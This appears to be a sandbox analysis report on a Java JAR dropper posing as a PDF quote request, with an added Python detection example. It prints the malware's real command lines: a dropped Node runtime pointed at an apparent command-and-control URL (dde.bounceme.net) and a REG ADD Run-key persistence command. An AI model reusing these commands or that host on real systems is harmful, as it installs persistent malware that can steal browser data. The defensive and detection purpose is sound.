Analysis
- max time kernel: 137s
- max time network: 149s
- platform: windows10_x64
- resource: win10v200430
- submitted: 30-06-2020 08:45

Static task: static1
Behavioral task: behavioral1
- Sample: EES RFQ 56-34___PDF.jar
- Resource: win7
Behavioral task: behavioral2
- Sample: EES RFQ 56-34___PDF.jar
- Resource: win10v200430
General
- Target: EES RFQ 56-34___PDF.jar
- Size: 11KB
- MD5: 8899cc56f4e52f5497fb7ec8c960dbb9
- SHA1: f5fc681e85c69c70b7ec6d5d223f5d8d5b4bbe04
- SHA256: 65b9dccf61b9749c5380bf61cc360b3d7e8ad8c50b843e4104c5040a10a79790
- SHA512: 1aa43d6fe686e6180806d53de82081d25e4902b13cdaea227799fea35f5bffab101bc254a30bad5134d6668381ac2662520c7f138ad965a788bd6f23e9e34b91
Malware Config
Signatures
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  14   | wtfismyip.com
  16   | wtfismyip.com
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes: java.exe, node.exe, cmd.exe
  description     | pid  | process  | target PID | target process
  wrote to memory | 652  | java.exe | 1240       | node.exe
  wrote to memory | 652  | java.exe | 1240       | node.exe
  wrote to memory | 1240 | node.exe | 3732       | cmd.exe
  wrote to memory | 1240 | node.exe | 3732       | cmd.exe
  wrote to memory | 3732 | cmd.exe  | 2724       | reg.exe
  wrote to memory | 3732 | cmd.exe  | 2724       | reg.exe
  wrote to memory | 1240 | node.exe | 3644       | node.exe
  wrote to memory | 1240 | node.exe | 3644       | node.exe
- Executes dropped EXE (2 IoCs)
  pid  | process
  1240 | node.exe
  3644 | node.exe
- Loads dropped DLL (4 IoCs)
  pid  | process
  3644 | node.exe (four dropped-DLL loads attributed to this process)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid  | process
  3644 | node.exe
  3644 | node.exe
- Adds Run entry to start application (2 TTPs, 2 IoCs)
  Process: reg.exe
  description     | ioc
  Key created     | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  Set value (str) | \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-9203296d = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-9203296d.cmd\""
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Process: node.exe
  description       | ioc
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
Processes
Process tree for this run. The number in brackets is the depth in the tree; PIDs are taken from the WriteProcessMemory table above. Each entry gives the image path, the command line, and the signatures attributed to that process.
- [1] C:\ProgramData\Oracle\Java\javapath\java.exe (PID 652)
  Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\EES RFQ 56-34___PDF.jar"
  - Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe (PID 1240)
    Command line: C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:2604@qhub-subscription.store.qua.one --register-startup --central-base-url https://dde.bounceme.net
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE
    - [3] C:\Windows\system32\cmd.exe (PID 3732)
      Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-9203296d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-9203296d.cmd\"""
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\reg.exe (PID 2724)
        Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-9203296d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-9203296d.cmd\""
        - Adds Run entry to start application
    - [3] C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe (PID 3644)
      Command line: C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:2604@qhub-subscription.store.qua.one --register-startup --central-base-url https://dde.bounceme.net
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Checks processor information in registry
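The process tree above is the part of this report that turns directly into detection logic: a JVM handing off to a binary dropped under the user profile, reg.exe writing an HKCU Run value whose target is a .cmd in that same profile directory, and the dropped Node runtime started with --register-startup and --central-base-url. The following is an added example, not part of the sandbox report or of the malware it analyses: it replays the chain as constructed Sysmon-style process-creation events (PIDs come from the Signatures tables; the explorer.exe parent, its PID, the event field names and the benign control event are assumptions) and runs three rules over them, walking the parent links so every hit carries its lineage back to java.exe.

```python
"""Added example (not part of the sandbox report or of the malware it analyses).

Replays the process-creation chain from the Processes section as constructed,
Sysmon-style events and applies three detections for what the report shows:
a JVM spawning a binary dropped under the user profile, reg.exe writing an
HKCU Run value whose target lives in the user profile, and the Node runtime
started with --register-startup and --central-base-url. Field names, the
explorer.exe parent and the benign control event are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the created process
    cmdline: str       # its command line
    parent_image: str  # full path of the parent


@dataclass
class Finding:
    rule: str
    pid: int
    detail: dict
    lineage: list      # image basenames from this process up to the oldest known ancestor


NODE = r"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe"
QDIR = r"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs"
ARGS = ("--group user:2604@qhub-subscription.store.qua.one "
        "--register-startup --central-base-url https://dde.bounceme.net")
REG_CMD = (r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-9203296d" '
           r'/t REG_SZ /F /D "cmd /D /C \"' + QDIR + r'\qnodejs-9203296d.cmd\""')

# Constructed events modelled on the report's tree (PIDs from the Signatures tables;
# the explorer.exe parent, its PID 400 and the last, benign event are invented).
EVENTS = [
    ProcEvent(652, 400, r"C:\ProgramData\Oracle\Java\javapath\java.exe",
              r'java -jar "C:\Users\Admin\AppData\Local\Temp\EES RFQ 56-34___PDF.jar"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(1240, 652, NODE, f"{NODE} {QDIR}\\wizard.js start {ARGS}",
              r"C:\ProgramData\Oracle\Java\javapath\java.exe"),
    ProcEvent(3732, 1240, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /d /s /c "' + REG_CMD + '"', NODE),
    ProcEvent(2724, 3732, r"C:\Windows\system32\reg.exe", REG_CMD,
              r"C:\Windows\system32\cmd.exe"),
    ProcEvent(3644, 1240, NODE, f"{NODE} {QDIR}\\qnodejs-win32-x64.js serve start {ARGS}", NODE),
    ProcEvent(5000, 4800, r"C:\Program Files\nodejs\node.exe",
              r'"C:\Program Files\nodejs\node.exe" server.js',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
]

JAVA_IMAGES = {"java.exe", "javaw.exe"}
USER_PROFILE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.I)
RUN_KEY = re.compile(r"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(?!Once)", re.I)
REG_ADD_VALUE = re.compile(r'REG\s+ADD\s.*?/V\s+"?([^"\s]+)"?.*?/D\s+"(.*)"\s*$', re.I | re.S)
WIN_PATH = re.compile(r'[a-z]:\\[^"]+', re.I)
BASE_URL = re.compile(r"--central-base-url\s+(\S+)", re.I)
BEACON_FLAGS = ("--register-startup", "--central-base-url")


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def lineage(pid: int, by_pid: dict) -> list:
    """Walk ppid links upward; stops at an unknown parent or a cycle."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def analyze(events: list) -> list:
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        chain = lineage(e.pid, by_pid)
        # 1. A JVM launching an executable under C:\Users\<name>\ is how the JAR
        #    hands off to the dropped node.exe (report: java.exe -> node.exe).
        if basename(e.parent_image) in JAVA_IMAGES and USER_PROFILE.match(e.image):
            findings.append(Finding("jvm_spawns_user_profile_binary", e.pid,
                                    {"image": e.image}, chain))
        # 2. reg.exe adding an HKCU Run value; the data is unescaped and the launched
        #    path pulled out so the target can be checked and collected.
        if basename(e.image) == "reg.exe" and RUN_KEY.search(e.cmdline):
            m = REG_ADD_VALUE.search(e.cmdline)
            if m:
                data = m.group(2).replace('\\"', '"')
                p = WIN_PATH.search(data)
                target = p.group(0) if p else ""
                findings.append(Finding("autorun_added_via_reg", e.pid, {
                    "value_name": m.group(1), "data": data, "target": target,
                    "target_in_user_profile": bool(USER_PROFILE.match(target))}, chain))
        # 3. The dropped runtime's CLI: --register-startup together with a
        #    --central-base-url, as on both node.exe command lines in the report.
        if all(flag in e.cmdline for flag in BEACON_FLAGS):
            u = BASE_URL.search(e.cmdline)
            findings.append(Finding("startup_registration_with_c2_url", e.pid,
                                    {"base_url": u.group(1) if u else ""}, chain))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"{f.rule:34} pid={f.pid:<5} {' <- '.join(f.lineage)}  {f.detail}")
```

Rule 2 deliberately matches only the reg.exe event, not the cmd.exe wrapper that carries the same REG ADD text, so one persistence write yields one finding; rule 1 and rule 3 both fire on PID 1240, which is the pivot from the JAR to the dropped runtime. The benign node.exe launched from Program Files by PowerShell produces nothing.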
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ffi-napi\prebuilds\win32-x64\node.napi.node
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\native-reg\prebuilds\win32-x64\node.napi.node
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ref-napi\prebuilds\win32-x64\node.napi.node
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\sqlite3\lib\binding\node-v79-win32-x64\node_sqlite3.node
- memory/1240-107-0x0000000000000000-mapping.dmp
- memory/1240-110-0x000003B259F00000-0x000003B259F01000-memory.dmp (Filesize: 4KB)
- memory/2724-113-0x0000000000000000-mapping.dmp
- memory/3644-114-0x0000000000000000-mapping.dmp
- memory/3644-116-0x000002BC2BE40000-0x000002BC2BE41000-memory.dmp (Filesize: 4KB)
- memory/3732-112-0x0000000000000000-mapping.dmp